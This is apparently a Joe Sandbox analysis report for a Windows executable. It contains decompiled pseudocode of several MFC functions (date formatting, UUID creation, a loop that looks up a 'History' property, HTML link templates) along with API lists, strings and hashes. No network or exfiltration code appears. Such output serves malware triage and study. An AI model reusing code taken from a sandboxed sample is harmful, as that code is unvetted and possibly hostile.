#800.MFC42 ref: 00418D02

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#800.MFC42 ref: 00418D5A
#3092.MFC42(000003F9,00454574), ref: 00418D6B
#6199.MFC42(000003F9,00454574), ref: 00418D72

Strings

Arial, xrefs: 00418BB7, 00418BCA

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3092$#800MessageSend$#1168#2243#4710#537#6199H_prologLoadStringlstrcpymemset
String ID: Arial
API String ID: 3213624125-493054409
Opcode ID: 1c5a3aa46f0a2864949f950dcefa2baf77cd7f35bf412aa7b3ec73d6508c9a42
Instruction ID: f61fd79e73c8ef8ce73ab983091c37a1c329913653e38a5eaefa36425ccff504
Opcode Fuzzy Hash: 1c5a3aa46f0a2864949f950dcefa2baf77cd7f35bf412aa7b3ec73d6508c9a42
Instruction Fuzzy Hash: 1051B070641248BBD728EBA2DC96FAF777DEB85708F10051EF152A61C1DBB86A04C718

Uniqueness

Uniqueness Score: -1.00%

Function 0042049A, Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 99
stringCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0042049A(intOrPtr __ecx) {
				CHAR* _t41;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t55;
				intOrPtr _t78;
				intOrPtr _t81;
				void* _t88;

				E0043E4E0(0x441edc, _t88);
				_t41 =  *(_t88 + 8);
				_t78 = __ecx;
				 *((intOrPtr*)(_t88 - 0x20)) = __ecx;
				if( *_t41 == 0) {
					lstrcpyA(_t78 + 0x152,  *(E00429029(_t88 - 0x18, 0xe014)));
					L0043DD36();
				} else {
					lstrcpyA(__ecx + 0x152, _t41);
				}
				_push( *((intOrPtr*)(_t88 + 0xc)));
				_push(_t88 - 0x14);
				E00420679(_t78);
				_t48 = _t88 + 8;
				_push(_t48);
				 *(_t88 - 4) = 0;
				L0043E162();
				L0043DDD8();
				_push(0);
				 *(_t88 - 4) = 1;
				L0043E288();
				_t49 =  *((intOrPtr*)(_t48 + 4));
				_push(0);
				 *((intOrPtr*)(_t88 + 0xc)) = _t49;
				L0043E288();
				_t50 =  *((intOrPtr*)(_t49 + 8));
				_push(0);
				 *((intOrPtr*)(_t88 - 0x1c)) = _t50;
				L0043E288();
				_push(0);
				L0043E288();
				_push(0);
				L0043E288();
				_push( *((intOrPtr*)(_t88 + 0xc)));
				_push( *((intOrPtr*)(_t88 - 0x1c)));
				_push( *((intOrPtr*)(_t50 + 0x14)) + 0x76c);
				_push( *((intOrPtr*)(_t50 + 0x10)) + 1);
				_push( *((intOrPtr*)(_t50 + 0xc)));
				_push("%02d-%02d-%d %02d:%02d");
				_push(_t88 - 0x10);
				L0043E174();
				_t81 =  *((intOrPtr*)(_t88 - 0x20));
				lstrcpyA(_t81 + 0x1c,  *(_t88 - 0x10));
				_t55 = lstrcpyA(_t81 + 0x4e,  *(_t88 - 0x14));
				 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
				L0043DD36();
				 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t88 - 0xc));
				return _t55;
			}

0x0042049f
0x004204a7
0x004204b0
0x004204b2
0x004204b5
0x004204e8
0x004204ed
0x004204b7
0x004204c5
0x004204c5
0x004204f2
0x004204fa
0x004204fb
0x00420500
0x00420505
0x00420506
0x00420509
0x00420511
0x00420516
0x0042051a
0x0042051e
0x00420523
0x00420526
0x0042052a
0x0042052d
0x00420532
0x00420535
0x00420539
0x0042053c
0x00420544
0x0042054e
0x00420556
0x0042055c
0x00420561
0x00420567
0x0042056a
0x0042056b
0x0042056c
0x00420570
0x00420575
0x00420576
0x0042057b
0x00420588
0x00420591
0x00420593
0x0042059a
0x0042059f
0x004205a6
0x004205b1
0x004205b9

APIs

__EH_prolog.LIBCMT ref: 0042049F
lstrcpyA.KERNEL32(?,?,?,?,?), ref: 004204C5
lstrcpyA.KERNEL32(?,00000000,?,?,?), ref: 004204E8
#800.MFC42(?,?,?), ref: 004204ED
#3811.MFC42(?,?,00000008,?,?,?), ref: 00420509
#540.MFC42(?,?,00000008,?,?,?), ref: 00420511
#3337.MFC42(00000000,?,?,00000008,?,?,?), ref: 0042051E
#3337.MFC42(00000000,00000000,?,?,00000008,?,?,?), ref: 0042052D
#3337.MFC42(00000000,00000000,00000000,?,?,00000008,?,?,?), ref: 0042053C
#3337.MFC42(00000000,00000000,00000000,00000000,?,?,00000008,?,?,?), ref: 0042054E
#3337.MFC42(00000000,00000000,00000000,00000000,00000000,?,?,00000008,?,?,?), ref: 0042055C
#2818.MFC42(?,%02d-%02d-%d %02d:%02d,?,?,?,?,00000008,00000000,00000000,00000000,00000000,00000000,?,?,00000008), ref: 00420576
lstrcpyA.KERNEL32(?,?,00000000,?,?,00000008,?,?,?), ref: 00420588
lstrcpyA.KERNEL32(?,?,?,?,?), ref: 00420591
#800.MFC42(?,?,?), ref: 0042059A
#800.MFC42(?,?,?), ref: 004205A6

Strings

%02d-%02d-%d %02d:%02d, xrefs: 00420570

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3337$lstrcpy$#800$#2818#3811#540H_prolog
String ID: %02d-%02d-%d %02d:%02d
API String ID: 1729780190-3031491251
Opcode ID: 5b98ede3ff9bdc8a4031ecf22832bccaeb22337cff8d7d32a19b7110e64b15c8
Instruction ID: 56ab26c35428acc48a7c3bb9438dd5f24b767c92c57669d4f880caef722fc54a
Opcode Fuzzy Hash: 5b98ede3ff9bdc8a4031ecf22832bccaeb22337cff8d7d32a19b7110e64b15c8
Instruction Fuzzy Hash: A1319072900108AFCF05EFE5DC85EEEBB78EF49354F40855AF5056B192DB38AA05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410EF3, Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00410EF3(intOrPtr* __ecx) {
				void* __esi;
				void* _t37;
				void* _t44;
				void* _t60;
				void* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t37 = E0043E4E0(0x4405b5, _t66);
				_t64 = __ecx;
				 *((intOrPtr*)(_t66 - 0x14)) = __ecx;
				L0043DDD8();
				 *((intOrPtr*)(_t66 - 4)) = 0;
				L0043DDD8();
				 *((char*)(_t66 - 4)) = 1;
				L0043DE26();
				 *((char*)(_t66 - 4)) = 2;
				L0043DE26();
				 *((char*)(_t66 - 4)) = 3;
				L0043DDD8();
				 *((char*)(_t66 - 4)) = 4;
				L0043DDD8();
				 *((char*)(_t66 - 4)) = 5;
				L0043DDD8();
				 *((char*)(_t66 - 4)) = 6;
				L0043DDD8();
				 *((char*)(_t66 - 4)) = 7;
				L004044F9(_t37, __ecx + 0x24, __ecx);
				 *((intOrPtr*)(_t64 + 0x40)) = 0x447034;
				 *((intOrPtr*)(_t64 + 0x44)) = 0;
				 *((intOrPtr*)(_t64 + 0x50)) = 0;
				 *((intOrPtr*)(_t64 + 0x4c)) = 0;
				 *((intOrPtr*)(_t64 + 0x48)) = 0;
				 *((char*)(_t66 - 4)) = 9;
				 *((intOrPtr*)(_t64 + 0x54)) = 0;
				L0043DDD8();
				 *((char*)(_t66 - 4)) = 0xa;
				 *((intOrPtr*)(_t64 + 0x5c)) = 1;
				 *_t64 = 0x447030;
				__imp__UuidCreate(_t66 - 0x24, "iso-8859-1", "text/plain", _t60, _t63, _t44);
				 *((intOrPtr*)(_t66 - 0x10)) = 0;
				__imp__UuidToStringA(_t66 - 0x24, _t66 - 0x10);
				L0043DDD2();
				__imp__RpcStringFreeA(_t66 - 0x10,  *((intOrPtr*)(_t66 - 0x10)));
				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
				return _t64;
			}

0x00410ef8
0x00410f02
0x00410f05
0x00410f0b
0x00410f15
0x00410f18
0x00410f25
0x00410f29
0x00410f36
0x00410f3a
0x00410f42
0x00410f46
0x00410f4e
0x00410f52
0x00410f5a
0x00410f5e
0x00410f66
0x00410f6a
0x00410f72
0x00410f76
0x00410f7b
0x00410f82
0x00410f85
0x00410f88
0x00410f8b
0x00410f91
0x00410f97
0x00410f9a
0x00410fa2
0x00410fa7
0x00410fae
0x00410fb4
0x00410fbd
0x00410fc5
0x00410fd0
0x00410fd9
0x00410fe7
0x00410fef

APIs

__EH_prolog.LIBCMT ref: 00410EF8
#540.MFC42 ref: 00410F0B
#540.MFC42 ref: 00410F18
#537.MFC42(text/plain), ref: 00410F29
#537.MFC42(iso-8859-1,text/plain), ref: 00410F3A
#540.MFC42(iso-8859-1,text/plain), ref: 00410F46
#540.MFC42(iso-8859-1,text/plain), ref: 00410F52
#540.MFC42(iso-8859-1,text/plain), ref: 00410F5E
#540.MFC42(iso-8859-1,text/plain), ref: 00410F6A
#540.MFC42 ref: 00410F9A
UuidCreate.RPCRT4 ref: 00410FB4
UuidToStringA.RPCRT4(?,?), ref: 00410FC5
#860.MFC42(?,?,?,?,?,?,?,?), ref: 00410FD0
RpcStringFreeA.RPCRT4(?), ref: 00410FD9

Strings

4pD, xrefs: 00410F7B
iso-8859-1, xrefs: 00410F2E
text/plain, xrefs: 00410F1D

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540$#537StringUuid$#860CreateFreeH_prolog
String ID: 4pD$iso-8859-1$text/plain
API String ID: 1286026054-4277725893
Opcode ID: 8f2374d50da981245fb8b43d862cbe1456e2858b51ce6f68f4d4263cef1a6b70
Instruction ID: b972c790513ab5944480ace23ca8f65072f69f3288099e0dd6200eea52a4d851
Opcode Fuzzy Hash: 8f2374d50da981245fb8b43d862cbe1456e2858b51ce6f68f4d4263cef1a6b70
Instruction Fuzzy Hash: 5D316FB4801784DECB21EFA6D5457DEFBF4AF68308F10485EE48353692DBB86608CB25

Uniqueness

Uniqueness Score: -1.00%

Function 0040A178, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0040A178(intOrPtr __ecx) {
				intOrPtr* _t73;
				signed int _t76;
				signed char _t79;
				void* _t82;
				intOrPtr* _t83;
				void* _t84;
				intOrPtr* _t86;
				void* _t87;
				void* _t95;
				signed int _t97;
				void* _t119;
				signed int _t120;
				signed int _t124;
				intOrPtr* _t128;
				void* _t129;
				void* _t131;
				void* _t132;

				E0043E4E0(0x43f9d4, _t129);
				_t132 = _t131 - 0x24;
				_t124 = 0;
				 *((intOrPtr*)(_t129 - 0x24)) = __ecx;
				 *((intOrPtr*)(_t129 - 0x30)) = 0;
				if( *((intOrPtr*)(_t129 + 0xc)) == 0) {
					L26:
					_push(0x4550cc);
					L0043DE26();
					L27:
					 *[fs:0x0] =  *((intOrPtr*)(_t129 - 0xc));
					return  *((intOrPtr*)(_t129 + 8));
				}
				 *0x455248 = 3;
				_push(_t129 - 0x30);
				_push(0x44a5e4);
				_push(0);
				 *0x455250 = 0;
				_push( *((intOrPtr*)(_t129 + 0xc)));
				if( *((intOrPtr*)(__ecx + 0x10))() != 0) {
					goto L26;
				}
				_t95 = 0x4550cc;
				_push(0x4550cc);
				 *(_t129 - 0x10) = 0;
				L0043DE26();
				_t73 =  *((intOrPtr*)(_t129 - 0x30));
				 *(_t129 - 0x14) = 0;
				_push(_t129 - 0x14);
				_push(_t73);
				 *(_t129 - 4) = 0;
				if( *((intOrPtr*)( *_t73 + 0x20))() == 0) {
					_t76 =  *(_t129 - 0x14) << 4;
					_push(_t76);
					L0043DD54();
					_t119 = 0;
					 *(_t129 - 0x2c) = _t76;
					if( *(_t129 - 0x14) <= 0) {
						L8:
						 *((intOrPtr*)(_t129 - 0x28)) = _t124;
						_t79 =  *((intOrPtr*)( *((intOrPtr*)(_t129 - 0x24)) + 0xc))( *((intOrPtr*)(_t129 - 0x30)), _t124,  *(_t129 - 0x14),  *(_t129 - 0x2c), _t129 - 0x28);
						if(_t79 != 0) {
							goto L3;
						}
						 *(_t129 + 0xf) =  *(_t129 + 0xf) & _t79;
						 *((intOrPtr*)(_t129 - 0x24)) = _t124;
						if( *((intOrPtr*)(_t129 - 0x28)) <= _t124) {
							L24:
							_push( *(_t129 - 0x2c));
							L0043DD42();
							_push(_t129 - 0x18);
							L0043DD3C();
							L25:
							 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
							L0043DD36();
							goto L27;
						}
						_t120 =  *(_t129 - 0x2c);
						 *(_t129 - 0x20) = _t120;
						do {
							if( *(_t129 + 0xf) == 0) {
								_t82 =  *_t120;
								 *((intOrPtr*)(_t129 - 0x1c)) = _t124;
								if(_t82 != 3) {
									if(_t82 == 9) {
										_t128 =  *((intOrPtr*)(_t120 + 8));
										 *((intOrPtr*)( *_t128))(_t128, 0x453680, _t129 - 0x1c);
										 *((intOrPtr*)( *_t128 + 8))(_t128);
									}
								} else {
									 *((intOrPtr*)(_t129 - 0x1c)) =  *((intOrPtr*)(_t120 + 8));
								}
								_t83 =  *((intOrPtr*)(_t129 - 0x1c));
								_t132 = _t132 - 0x10;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t84 =  *((intOrPtr*)( *_t83 + 0x28))(_t83, _t129 - 0x10);
								if( *(_t129 - 0x10) != 0 && _t84 == 0 && wcscmp(L"History",  *(_t129 - 0x10)) == 0) {
									__imp__#6( *(_t129 - 0x10));
									_t86 =  *((intOrPtr*)(_t129 - 0x1c));
									_t132 = _t132 - 0x10;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_t87 =  *((intOrPtr*)( *_t86 + 0x2c))(_t86, _t129 - 0x10);
									if( *(_t129 - 0x10) != 0 && _t87 == 0) {
										L0043E150();
										__imp__#6( *(_t129 - 0x10),  *(_t129 - 0x10));
										 *(_t129 + 0xf) = 1;
									}
								}
								_t120 =  *(_t129 - 0x20);
								_t124 = 0;
							}
							__imp__#9(_t120);
							 *((intOrPtr*)(_t129 - 0x24)) =  *((intOrPtr*)(_t129 - 0x24)) + 1;
							_t120 = _t120 + 0x10;
							 *(_t129 - 0x20) = _t120;
						} while ( *((intOrPtr*)(_t129 - 0x24)) <  *((intOrPtr*)(_t129 - 0x28)));
						goto L24;
					} else {
						_t97 = _t76;
						do {
							__imp__#8(_t97);
							_t119 = _t119 + 1;
							_t97 = _t97 + 0x10;
						} while (_t119 <  *(_t129 - 0x14));
						_t95 = 0x4550cc;
						goto L8;
					}
				}
				L3:
				_push(_t95);
				L0043DE26();
				goto L25;
			}

0x0040a17d
0x0040a182
0x0040a187
0x0040a18d
0x0040a190
0x0040a193
0x0040a351
0x0040a354
0x0040a359
0x0040a35e
0x0040a366
0x0040a36f
0x0040a36f
0x0040a19c
0x0040a1a5
0x0040a1a6
0x0040a1ab
0x0040a1ac
0x0040a1b2
0x0040a1ba
0x00000000
0x00000000
0x0040a1c0
0x0040a1c8
0x0040a1c9
0x0040a1cc
0x0040a1d1
0x0040a1d7
0x0040a1da
0x0040a1dd
0x0040a1de
0x0040a1e6
0x0040a1f9
0x0040a1fc
0x0040a1fd
0x0040a202
0x0040a208
0x0040a20b
0x0040a224
0x0040a227
0x0040a238
0x0040a23d
0x00000000
0x00000000
0x0040a23f
0x0040a245
0x0040a248
0x0040a32e
0x0040a32e
0x0040a331
0x0040a33d
0x0040a33e
0x0040a343
0x0040a343
0x0040a34a
0x00000000
0x0040a34a
0x0040a24e
0x0040a256
0x0040a259
0x0040a25d
0x0040a263
0x0040a266
0x0040a26d
0x0040a27b
0x0040a27d
0x0040a28c
0x0040a291
0x0040a291
0x0040a26f
0x0040a272
0x0040a272
0x0040a29a
0x0040a29d
0x0040a2a4
0x0040a2a5
0x0040a2a6
0x0040a2a8
0x0040a2a9
0x0040a2b0
0x0040a2cd
0x0040a2d9
0x0040a2dc
0x0040a2e3
0x0040a2e4
0x0040a2e5
0x0040a2e7
0x0040a2e8
0x0040a2ef
0x0040a2fb
0x0040a303
0x0040a309
0x0040a309
0x0040a2ef
0x0040a30d
0x0040a310
0x0040a310
0x0040a313
0x0040a319
0x0040a31c
0x0040a322
0x0040a325
0x00000000
0x0040a20d
0x0040a20d
0x0040a20f
0x0040a210
0x0040a216
0x0040a217
0x0040a21a
0x0040a21f
0x00000000
0x0040a21f
0x0040a20b
0x0040a1e8
0x0040a1eb
0x0040a1ec
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0040A17D
#537.MFC42(004550CC,?,?,00000000), ref: 0040A1CC
#537.MFC42(004550CC,?,?,00000000), ref: 0040A1EC
#823.MFC42(?,?,?,00000000), ref: 0040A1FD
VariantInit.OLEAUT32(00000000), ref: 0040A210
wcscmp.MSVCRT ref: 0040A2BE
SysFreeString.OLEAUT32(00000000), ref: 0040A2CD
#861.MFC42(00000000), ref: 0040A2FB
SysFreeString.OLEAUT32(00000000), ref: 0040A303
VariantClear.OLEAUT32(?), ref: 0040A313
#800.MFC42(004550CC,?,?,00000000), ref: 0040A34A
#537.MFC42(004550CC,?,?,00000000), ref: 0040A359

Strings

HRE, xrefs: 0040A251
History, xrefs: 0040A2B9

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537$FreeStringVariant$#800#823#861ClearH_prologInitwcscmp
String ID: HRE$History
API String ID: 2829193234-650093438
Opcode ID: 7f353e4b19f91a7353e8edc8584523a8f8a10ff1201cd8c487b9c0eb3573ed57
Instruction ID: a36b2953deea37e944a7b106475b5a66946117464f9bc424d7a178f90236976b
Opcode Fuzzy Hash: 7f353e4b19f91a7353e8edc8584523a8f8a10ff1201cd8c487b9c0eb3573ed57
Instruction Fuzzy Hash: 54617E70D00219EFCB11EFA9D844AEEBBB4FF48754F10452AF811B7291D7389A51CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00429920, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00429920(void* __eflags) {
				intOrPtr* _t57;
				intOrPtr* _t63;
				signed char _t68;
				void* _t87;
				intOrPtr _t89;
				signed int _t93;
				void* _t95;

				E0043E4E0(0x44304b, _t95);
				 *(_t95 - 0x1c) =  *(_t95 - 0x1c) & 0x00000000;
				L0043DDD8();
				_t68 = 1;
				 *(_t95 - 4) = _t68;
				L0043DDD8();
				_t89 =  *((intOrPtr*)(_t95 + 0xc));
				_t93 =  *(_t95 + 0x10) * 0x1004;
				_push(_t95 - 0x2c);
				 *(_t95 - 4) = 2;
				L0043E4A4();
				 *(_t95 + 0x10) = E004290DB( *((intOrPtr*)(_t89 + 4)) + _t93, _t95 - 0x18, _t95 - 0x2c);
				 *(_t95 - 4) = 3;
				_t57 = E00429098( *((intOrPtr*)(_t89 + 4)) + _t93, _t95 + 0xc, _t95 - 0x2c);
				 *(_t95 - 4) = 4;
				_push( *( *(_t95 + 0x10)));
				_push( *_t57);
				_push("%s, %s");
				_push(_t95 - 0x10);
				L0043E174();
				 *(_t95 - 4) = 3;
				L0043DD36();
				 *(_t95 - 4) = 2;
				L0043DD36();
				 *(_t95 + 0x10) = E004290DB(_t95 - 0x18, _t95 - 0x18, _t95 - 0x2c);
				 *(_t95 - 4) = 5;
				_t63 = E00429029(_t95 + 0xc, 0xe017);
				 *(_t95 - 4) = 6;
				_t31 =  *((intOrPtr*)(_t89 + 4)) + _t93 + 4; // 0x9
				_t87 = _t31;
				_push(_t87);
				_push( *((intOrPtr*)(_t95 - 0x10)));
				_push(_t87);
				_push( *((intOrPtr*)(_t89 + 4)) + _t93 + 0x804);
				_push( *( *(_t95 + 0x10)));
				_push( *_t63);
				_push("<H2>%s %s</H2><H3>%s</H3><P><A target=_blank href=\"%s\" title=\"%s\">%s</A></P>");
				_push(_t95 - 0x14);
				L0043E174();
				 *(_t95 - 4) = 5;
				L0043DD36();
				 *(_t95 - 4) = 2;
				L0043DD36();
				_push(_t95 - 0x14);
				L0043DD3C();
				 *(_t95 - 0x1c) = _t68;
				 *(_t95 - 4) = _t68;
				L0043DD36();
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return  *((intOrPtr*)(_t95 + 8));
			}

0x00429925
0x0042992d
0x00429937
0x00429941
0x00429942
0x00429945
0x0042994d
0x00429950
0x0042995c
0x0042995f
0x00429963
0x00429975
0x0042997b
0x00429984
0x0042998f
0x00429993
0x00429995
0x0042999a
0x0042999f
0x004299a0
0x004299ab
0x004299af
0x004299b7
0x004299bb
0x004299cd
0x004299d9
0x004299dd
0x004299e8
0x004299ee
0x004299ee
0x004299f7
0x004299f8
0x004299fb
0x004299fc
0x00429a00
0x00429a02
0x00429a07
0x00429a0c
0x00429a0d
0x00429a18
0x00429a1c
0x00429a24
0x00429a28
0x00429a33
0x00429a34
0x00429a39
0x00429a3f
0x00429a42
0x00429a47
0x00429a4e
0x00429a5c
0x00429a64

APIs

__EH_prolog.LIBCMT ref: 00429925
#540.MFC42(?,000007E4,00000000), ref: 00429937
#540.MFC42(?,000007E4,00000000), ref: 00429945
#6673.MFC42(00000000,?,000007E4,00000000), ref: 00429963

Part of subcall function 004290DB: GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,00455AE8,00000032,00000000,?,?,00429D29,?,?,?,?), ref: 004290FD
Part of subcall function 004290DB: #537.MFC42(00455AE8,?,00429D29,?,?,?,?), ref: 00429107

Part of subcall function 00429098: GetDateFormatA.KERNEL32(00000400,00000000,?,dddd, d MMMM,00455B1C,00000032,?,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290BD
Part of subcall function 00429098: CharUpperBuffA.USER32(00455B1C,00000001,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290C6
Part of subcall function 00429098: #537.MFC42(00455B1C,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290D0

#2818.MFC42(00000001,%s, %s,00000000,00000001,00000000,?,000007E4,00000000), ref: 004299A0
#800.MFC42(?,?,?,?,00000000,?,000007E4,00000000), ref: 004299AF
#800.MFC42(?,?,?,?,00000000,?,000007E4,00000000), ref: 004299BB

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#2818.MFC42(?,<H2>%s %s</H2><H3>%s</H3><P><A target=_blank href="%s" title="%s">%s</A></P>,00000000,00000001,-000007FF,00000009,00000001,00000009), ref: 00429A0D
#800.MFC42 ref: 00429A1C
#800.MFC42 ref: 00429A28
#535.MFC42(?), ref: 00429A34
#800.MFC42(?), ref: 00429A42
#800.MFC42(?), ref: 00429A4E

Strings

<H2>%s %s</H2><H3>%s</H3><P><A target=_blank href="%s" title="%s">%s</A></P>, xrefs: 00429A07
%s, %s, xrefs: 0042999A
K0D, xrefs: 00429920

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
